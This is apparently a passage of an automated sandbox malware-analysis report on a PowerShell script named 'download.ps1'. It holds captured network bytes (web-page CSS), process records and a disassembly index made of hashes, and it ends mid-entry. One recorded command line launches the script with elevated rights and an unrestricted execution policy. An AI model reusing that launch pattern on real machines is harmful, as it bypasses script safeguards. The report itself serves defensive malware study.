                                                                                            Jan 7, 2025 14:34:08.572346926 CET1236INData Raw: 62 6c 6f 63 6b 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 3b 70 6f 73 69
                                                                                            Data Ascii: block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-height:27px;padding:0;vertical-align:top}.gbt{*display:in
                                                                                            Jan 7, 2025 14:34:08.572357893 CET1236INData Raw: 70 61 64 64 69 6e 67 3a 32 37 70 78 20 30 20 30 3b 77 69 64 74 68 3a 31 70 78 7d 2e 67 62 7a 74 3a 68 6f 76 65 72 2c 2e 67 62 7a 74 3a 66 6f 63 75 73 2c 2e 67 62 67 74 2d 68 76 72 2c 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e
                                                                                            Data Ascii: padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:none;_background-image:none;background-position:0 -102px;background-repeat:repeat-x;outline:none;text-decoration:none !important
                                                                                            Jan 7, 2025 14:34:08.572369099 CET1236INData Raw: 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 77 69 64 74 68 3a 31 36 70
                                                                                            Data Ascii: 5d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-6px -22px}.gbn .gbmt,.gbn .gbmt:visited,.gbnd .gbmt,.gbnd .gbmt:visited{color:#dd8e27 !important}.gbf .gbmt,.gbf .gbmt:visited
                                                                                            Jan 7, 2025 14:34:08.572381020 CET1236INData Raw: 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65
                                                                                            Data Ascii: color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,0,.12);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.12);box-shadow:0 2px 4px rgba(0,0,0
                                                                                            Jan 7, 2025 14:34:08.577210903 CET1236INData Raw: 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65
                                                                                            Data Ascii: 0 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:08:34:01
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:08:34:01
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 00007FFD348D7D46 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: O((z$O((z
                                                                                              • API String ID: 0-3082754232
                                                                                              • Opcode ID: 2601fb8b2551083a03b9362561415a8e600b3a612945a9d588957035625966d4
                                                                                              • Instruction ID: 77a834e677c33a2a866c566743c8e65a330996ca71cc5e740593ff7e16038829
                                                                                              • Opcode Fuzzy Hash: 2601fb8b2551083a03b9362561415a8e600b3a612945a9d588957035625966d4
                                                                                              • Instruction Fuzzy Hash: 81F1C830A09A8D8FEBA8EF28C8557E977D1FF55310F04436EE85DC7291CB3899458B81
                                                                                              Function 00007FFD348D8AF2 Relevance: 3.0, Strings: 2, Instructions: 458COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: O((z$O((z
                                                                                              • API String ID: 0-3082754232
                                                                                              • Opcode ID: 7bff1cb3a923b5c95c7569bcd1f89c502295999c2a96308bf2ce0112df19e98e
                                                                                              • Instruction ID: c3c6a0bf31fce207774225819fd585d366b908f847fbd2c97ebcd20cca77bd06
                                                                                              • Opcode Fuzzy Hash: 7bff1cb3a923b5c95c7569bcd1f89c502295999c2a96308bf2ce0112df19e98e
                                                                                              • Instruction Fuzzy Hash: 26E1C630A09A4D8FEBA8DF28C8557E977E1FF55310F14476EE85DC7291CE78A8448B81
                                                                                              Function 00007FFD348C95F2 Relevance: .7, Instructions: 678COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 244b6bdf231f30ccb3b311914b2ebec4fe69ce7b9bcb3b5862d2e5f89d103f94
                                                                                              • Instruction ID: fe4078bdc83df3c6b412853c9640e7a3ef397561d74e69a46639a271623bacb1
                                                                                              • Opcode Fuzzy Hash: 244b6bdf231f30ccb3b311914b2ebec4fe69ce7b9bcb3b5862d2e5f89d103f94
                                                                                              • Instruction Fuzzy Hash: 7022D531A0CA498FDB94DF5CC4A5AA9BBE1FF59310F1401AAD449D7292DE38FC42CB81
                                                                                              Function 00007FFD348D8706 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: O((z$O((z
                                                                                              • API String ID: 0-3082754232
                                                                                              • Opcode ID: 6520216df932c6a95a91df4873dc95d83724a8c7ebe9eea3b85e51cbfe31a48e
                                                                                              • Instruction ID: 3dff1d27f225cbf98ab9a0bb81c94544e18285346079c32c574304fcd6975688
                                                                                              • Opcode Fuzzy Hash: 6520216df932c6a95a91df4873dc95d83724a8c7ebe9eea3b85e51cbfe31a48e
                                                                                              • Instruction Fuzzy Hash: F6B1B730609A4D4FDBA9DF28C8557E93BE1FF56350F14426AE85DC7292CA389845CB82
                                                                                              Function 00007FFD347AE620 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226183263.00007FFD347AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347AD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd347ad000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: O((z
                                                                                              • API String ID: 0-971028135
                                                                                              • Opcode ID: 049a2322525e73e8c042b228e420234e0c4fd714cb7da43112e723967ff46815
                                                                                              • Instruction ID: 3dcbcf85d1fcfcfe7d39a8d39993f7b7b09d6b69f13f14d2258284f63f209ff7
                                                                                              • Opcode Fuzzy Hash: 049a2322525e73e8c042b228e420234e0c4fd714cb7da43112e723967ff46815
                                                                                              • Instruction Fuzzy Hash: E3412B7180EBC48FE7969B3998559523FF0EF57320B1905DFD088CB1A3D629B846C7A2
                                                                                              Function 00007FFD348C6B9D Relevance: .6, Instructions: 588COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23874b88b2de04fcc78ece90b7f233dda41669d816ba679b6f71f60a33b83207
                                                                                              • Instruction ID: f7c788a9f04f729a16aa83bae9f845cf5103f7b7d607ed2c8174ab9f4bf9d8ec
                                                                                              • Opcode Fuzzy Hash: 23874b88b2de04fcc78ece90b7f233dda41669d816ba679b6f71f60a33b83207
                                                                                              • Instruction Fuzzy Hash: C5020930A18A4D8FDB95DF5CC4A1AA9BBE1FF5A310F14417AD449D72A6CA38FC42C781
                                                                                              Function 00007FFD348D2899 Relevance: .2, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 146de4b2793d080ec2f82388efeb6dd8d4f5c3ca5a90c0d310a262c6d1d67d94
                                                                                              • Instruction ID: a90f7f8e50e628dcc085b6c46d84f64bfd57b4570868c7f59b8a38916a253350
                                                                                              • Opcode Fuzzy Hash: 146de4b2793d080ec2f82388efeb6dd8d4f5c3ca5a90c0d310a262c6d1d67d94
                                                                                              • Instruction Fuzzy Hash: 12F0A03590D78C8FCB55EF2888694E97FE0FF66310B04029BE948C7061DB259948CBC2
                                                                                              Function 00007FFD348D2165 Relevance: .1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 643de03259ac2d59ca9c282d439375bda3ea10465dd5c0f1d5fc86bef8bf2101
                                                                                              • Instruction ID: 4e235974a852828881c34d8aee56f7bfbbf8a721a17e278232025e9408058e92
                                                                                              • Opcode Fuzzy Hash: 643de03259ac2d59ca9c282d439375bda3ea10465dd5c0f1d5fc86bef8bf2101
                                                                                              • Instruction Fuzzy Hash: 7B31F23191CB489FDB189F5C984A6A97BE0FBA9310F00426FE049C3292DB74A855CBC2
                                                                                              Function 00007FFD348D2BC6 Relevance: .1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96353ee003e2e111375fd4992139db3a9d146694ba9a0e770d6f4db22f96f477
                                                                                              • Instruction ID: c09e702a66af250756b9b4d069c93127b10262f0697a40ab60d6e6ff6485b9c3
                                                                                              • Opcode Fuzzy Hash: 96353ee003e2e111375fd4992139db3a9d146694ba9a0e770d6f4db22f96f477
                                                                                              • Instruction Fuzzy Hash: 4F210330A0CB4C8FDB58DF9C98897E97BE0EB96321F04826FD409C3152D7749846CB81
                                                                                              Function 00007FFD348D8204 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 717020ee0462c59848616130b9967344714d99e22fe0557291d1be51e29d7a20
                                                                                              • Instruction ID: 8c76bcc6c5e4e4846a2f9bea4dcb1a5c33c4b191af02f9705e4cc4bf23800ee2
                                                                                              • Opcode Fuzzy Hash: 717020ee0462c59848616130b9967344714d99e22fe0557291d1be51e29d7a20
                                                                                              • Instruction Fuzzy Hash: BB313E30A1A94D8EFBB49F14CC69BF93291FF47319F400639D51DC6092CA3C6985DA11
                                                                                              Function 00007FFD348C5395 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ef20a273488680844466aae72d4dfae85443a4d99ab85de7be8fbdac6cbbffc
                                                                                              • Instruction ID: e0bf69237d34b19679a2af32533bb9d89f8df4d78890bc7dd54be8b80e359ba9
                                                                                              • Opcode Fuzzy Hash: 5ef20a273488680844466aae72d4dfae85443a4d99ab85de7be8fbdac6cbbffc
                                                                                              • Instruction Fuzzy Hash: 8C01A73020CB0C4FDB44EF4CE451AA5B3E0FB99320F10052EE58AC3651D636E881CB41
                                                                                              Function 00007FFD34B71C6C Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96f36de7433c5c4c6f3f6995058ee1744a2678ea3c9161bb5eadd23a7ddd4d2b
                                                                                              • Instruction ID: a7cebcd0a26722fe1e753919f8486329429da29f8ce625986149cf46ae1adaaf
                                                                                              • Opcode Fuzzy Hash: 96f36de7433c5c4c6f3f6995058ee1744a2678ea3c9161bb5eadd23a7ddd4d2b
                                                                                              • Instruction Fuzzy Hash: E7F0F032B0D5048FDB58EB5CE8918A43BE0FF06320B1440B6E10CCB1A7CA2AFC01CB61
                                                                                              Function 00007FFD34B71F1A Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75ce007fbde22acf30292098d40dee26aaf8d69e08b35e26ce20ed55b17288fd
                                                                                              • Instruction ID: 8d47275c8ed6f6549786481eaf73ac834ec005b3dec23253f5371c67108353be
                                                                                              • Opcode Fuzzy Hash: 75ce007fbde22acf30292098d40dee26aaf8d69e08b35e26ce20ed55b17288fd
                                                                                              • Instruction Fuzzy Hash: C8F0B431B4D5458FDB54EB4CE4914E877E0FF0632070440B6E10DCB1A3CA2AEC44C761
                                                                                              Function 00007FFD34B73654 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2230296034.00007FFD34B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34b70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e29dde9fdd98ed4ef0f1f928df5f9b2252af0765bd205a4f48ca58823babdc18
                                                                                              • Instruction ID: f3744e0144c5cd710311a341cbe72643d17f68df88b71d4645c77b4e6003500d
                                                                                              • Opcode Fuzzy Hash: e29dde9fdd98ed4ef0f1f928df5f9b2252af0765bd205a4f48ca58823babdc18
                                                                                              • Instruction Fuzzy Hash: 60F0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44AC3651DB25E8818786

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD348C83FB Relevance: 5.2, Strings: 4, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-4267328068
                                                                                              • Opcode ID: 35be13763df9e252968105d9ce51687ecbff3ecb9ab112651dab47c08ddc7af6
                                                                                              • Instruction ID: f8927c1f552a38f38adf5b1e22fd2a1ec6919e82ddf4a3901b9e8388733ae645
                                                                                              • Opcode Fuzzy Hash: 35be13763df9e252968105d9ce51687ecbff3ecb9ab112651dab47c08ddc7af6
                                                                                              • Instruction Fuzzy Hash: 8071C356A4DAC25FF762433809FA0DAABD4EF1332570915F7C698C7093EE1D2C07A646
                                                                                              Function 00007FFD348CEB40 Relevance: 3.5, Strings: 2, Instructions: 955COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: YK_I$ZK_I
                                                                                              • API String ID: 0-1876443982
                                                                                              • Opcode ID: e8909de0d66ab03e935c33f857a2eb4058a0cbaf959d29b347d5b09e349338fb
                                                                                              • Instruction ID: 38ba59e6e53754df5f6402630d3dccd4dc28efcf683d3cacb54103d5c96ca960
                                                                                              • Opcode Fuzzy Hash: e8909de0d66ab03e935c33f857a2eb4058a0cbaf959d29b347d5b09e349338fb
                                                                                              • Instruction Fuzzy Hash: 5342F853B0E5911BF32567FD79B10FD9B64EF8233470C53F7D2889B09BA828B8468295
                                                                                              Function 00007FFD348C57F2 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4$K_^
                                                                                              • API String ID: 0-150298877
                                                                                              • Opcode ID: 4596f6016ebf5f4550cbeffae6ede8c1124e30f15807cb6efae24d38a9779743
                                                                                              • Instruction ID: a91198b5975a234eb7821efb637b51f752548129df4e988875aea8ba287a2bde
                                                                                              • Opcode Fuzzy Hash: 4596f6016ebf5f4550cbeffae6ede8c1124e30f15807cb6efae24d38a9779743
                                                                                              • Instruction Fuzzy Hash: 8A717556A0F7D21EFB93537C69F60E6BFA0DF5326470906B7C284CA093AD1C1C0BA661
                                                                                              Function 00007FFD348D08FA Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K
                                                                                              • API String ID: 0-856455061
                                                                                              • Opcode ID: f068c6697081f935e3802f010e21a28c961e0a20a29d7c1e1bc9af6f463bf95e
                                                                                              • Instruction ID: fffdfc07c84be6687c1019c86f3fe3adbade6821d866e627e97aaa4fb21f2ee7
                                                                                              • Opcode Fuzzy Hash: f068c6697081f935e3802f010e21a28c961e0a20a29d7c1e1bc9af6f463bf95e
                                                                                              • Instruction Fuzzy Hash: 78D19357A0F6D65FE712677C68F10E93B60DE5332870D02F7C6C48A093AD28684A97A6
                                                                                              Function 00007FFD34992E92 Relevance: 1.2, Instructions: 1229COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2227281373.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd34990000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56700bbb91fc9cc0e386f301be937920cfa45ca4b673b94cecb0d6747eebb550
                                                                                              • Instruction ID: 544772ec075701aec4e8756cfaad7ea767ab19846dbb97c75a5fc6b28568f5d5
                                                                                              • Opcode Fuzzy Hash: 56700bbb91fc9cc0e386f301be937920cfa45ca4b673b94cecb0d6747eebb550
                                                                                              • Instruction Fuzzy Hash: 31723821B0DB854FDBAADE2C84A58643BE1EF6F31071901FEC589CB197D929EC46C391
                                                                                              Function 00007FFD348C90DD Relevance: .4, Instructions: 419COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29ccc7cc19c071a044078c8828b33fc887280d0220098e9e689096dcbb8e90f1
                                                                                              • Instruction ID: 54d54711cf9fa291248ec85a9af945aba2875d5aa2883dcb5c48c7bd88cf49ee
                                                                                              • Opcode Fuzzy Hash: 29ccc7cc19c071a044078c8828b33fc887280d0220098e9e689096dcbb8e90f1
                                                                                              • Instruction Fuzzy Hash: 4651A357A0DAC25FF712472C19EA0D9BBE0EF136A471911F7C595CB0A3EE0D2C079A91
                                                                                              Function 00007FFD348C54EC Relevance: .3, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae2d86b5ab6c36ff339a2150a97a31ec3ff75b9629a0a9055a7a8d96f61c7570
                                                                                              • Instruction ID: 4877d85e9ec28fda7c51e41936c953c6a5548412e04c51d88ba259466ee7a023
                                                                                              • Opcode Fuzzy Hash: ae2d86b5ab6c36ff339a2150a97a31ec3ff75b9629a0a9055a7a8d96f61c7570
                                                                                              • Instruction Fuzzy Hash: D0A1C662B0EADA0FEB92977C58B91B5BBE0DF5722470901FBC188CB1A3DD1C6C468351
                                                                                              Function 00007FFD348C286A Relevance: .2, Instructions: 214COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c3b39f3777beb45e8ce19e179dceeac484465c769e55e3c2c3ccdd57e32426e6
                                                                                              • Instruction ID: 3283344b0585678a9c3563358b4b160b37a0d76a4046fdc5932935dd6aa24d56
                                                                                              • Opcode Fuzzy Hash: c3b39f3777beb45e8ce19e179dceeac484465c769e55e3c2c3ccdd57e32426e6
                                                                                              • Instruction Fuzzy Hash: 83614D27E0D6921FF713576CA9B60EA7FA0DF4326471A11F7C685CA0E3ED1D180AA261
                                                                                              Function 00007FFD348C58CC Relevance: .2, Instructions: 208COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
                                                                                              • Instruction ID: cc44e1a872615e0b0c3dc005870fe9a346bed32c658744489eba7bf5dc4efe22
                                                                                              • Opcode Fuzzy Hash: f6b23900225d7115e260135b5f6f096d5b47927bb4e78891790602f88d2940dd
                                                                                              • Instruction Fuzzy Hash: 0A518456B0F7D21EFA93536D69F50E6BFA0EF5326470906B7C295C6093AC0C180BB662
                                                                                              Function 00007FFD348C94F2 Relevance: .1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2226699635.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffd348c0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13ea3b70d995d6ef8db4431ac09d94a7c0f1e6564c25ee9719a70959d58cbb6e
